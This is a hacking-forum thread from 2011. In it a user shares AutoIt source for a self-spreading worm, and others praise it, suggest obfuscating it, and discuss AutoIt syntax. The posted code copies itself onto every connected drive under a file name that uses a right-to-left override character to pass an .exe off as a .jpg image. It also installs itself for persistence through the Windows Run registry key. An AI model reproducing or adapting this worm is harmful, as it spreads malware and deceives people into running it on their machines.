![]() |
|
[AutoIt]Basic Worm with Extension Exploit - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Coding (https://sinister.li/Forum-Coding--71) +--- Thread: [AutoIt]Basic Worm with Extension Exploit (/Thread-AutoIt-Basic-Worm-with-Extension-Exploit) |
[AutoIt]Basic Worm with Extension Exploit - 1llusion - 10-09-2011 Basic worm, it uses extension exploit to SE people to click it. It spreads through connected drivers. Note: You HAVE to compile the source or it won't work... Code: #Region 'Vars'
Dim $Drives[25] ;Will hold info about existing drivers
Dim $Num = 0 ;Number of drivers
Dim $Temp = 65 ;Ascii value of drivers [A to Z]
#endregion
While 1
startup()
Spreading()
Wend
#region 'Spreading'
Func Spreading()
$Num = 0
While $Temp <= 90 ;Instead of huge IF statement, using ASCII values to check drivers
If FileExists(Chr($Temp) & ':\') Then
$Drives[$Num] = Chr($Temp) & ':\' ;Adding the found driver to array
$Num += 1
EndIf
$Temp += 1
Wend
$Temp = 0 ;Reseting Temp so it can be re-used to spread
While $Temp <= $Num
If NOT FIleExists($Drives[$Temp] & ExtExploit()) Then
FileCopy ('SoundDrivers.exe', $Drives[$Temp] & ExtExploit(), 1)
EndIf
$Temp += 1
WEnd
EndFunc
Func ExtExploit() ;extension exploit
$mystring="jpg" ;desired extension
$reverse_string = ""
$string_length = StringLen($mystring)
For $i = 1 to $string_length ;reversing the string... damn you autoit for not making a function!!!
$last_n_chrs = StringRight($mystring, $i)
$nth_chr = StringTrimRight($last_n_chrs, $i-1)
$reverse_string= $reverse_string & $nth_chr
Next
$Name = "Party Time! at M" & ChrW(8238) & $reverse_string & ".exe"
return ($Name)
EndFunc
#endregion
Func Startup()
If NOT FileExists(@AppDataDir & '\SoundDrivers.exe') Then
FileCopy ('SoundDrivers.exe', @AppDataDir & '/SoundDrivers.exe', 1)
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SoundDrivers", "REG_SZ", @ScriptFullPath)
EndIf
EndFuncRE: [AutoIt]Basic Worm with Extension Exploit - Jacob - 10-09-2011 and you taught yourself au3? WTF ive been working for a week, and couldnt make something like this.....granted im sure i could if i really really tried, and knew ho wworms work and shit. i guess knowing how it all works is the first step. anyways, great code, you should compile and obfuscate it, so it no get leech. RE: [AutoIt]Basic Worm with Extension Exploit - 1234hotmaster - 10-09-2011 Au3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 gr8 code! ![]() btw doesn't this belong to other language forum? RE: [AutoIt]Basic Worm with Extension Exploit - 1llusion - 10-10-2011 (10-09-2011, 02:04 AM)½ ÷ ½ ≡ ¼ Wrote: and you taught yourself au3? I made this basically the first day I saw AutoIt xD AutoIt is easy for me because it uses BASIC-like syntax =) Well, the main thing is to know WHAT you want and HOW to achieve it, the language is just a tool =) (Quoted from Frooxius) Thanks! (10-09-2011, 02:14 AM)1234Darkmaster Wrote: Au3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 Thanks =) Well, AutoIt is BASIC-like language and I would say it pretty much goes to the VB.Net and stuff... well... might be wrong forum tbh xD RE: [AutoIt]Basic Worm with Extension Exploit - Jacob - 10-10-2011 au3 is almost clone of vb2010 and such. RE: [AutoIt]Basic Worm with Extension Exploit - 1llusion - 10-10-2011 (10-10-2011, 05:32 PM)½ ÷ ½ ≡ ¼ Wrote: au3 is almost clone of vb2010 and such. Well it uses much more of traditional BASIC syntax then VB.Net etc... for example the variables: $a <= that was typical for old BASIC RE: [AutoIt]Basic Worm with Extension Exploit - hamza-b11 - 04-29-2012 ver good 1llusion Thanks RE: [AutoIt]Basic Worm with Extension Exploit - #Unkn0wn - 05-03-2012 Now I have to jump for AutoIT (Need to learn it) :dance: And nice code bro
|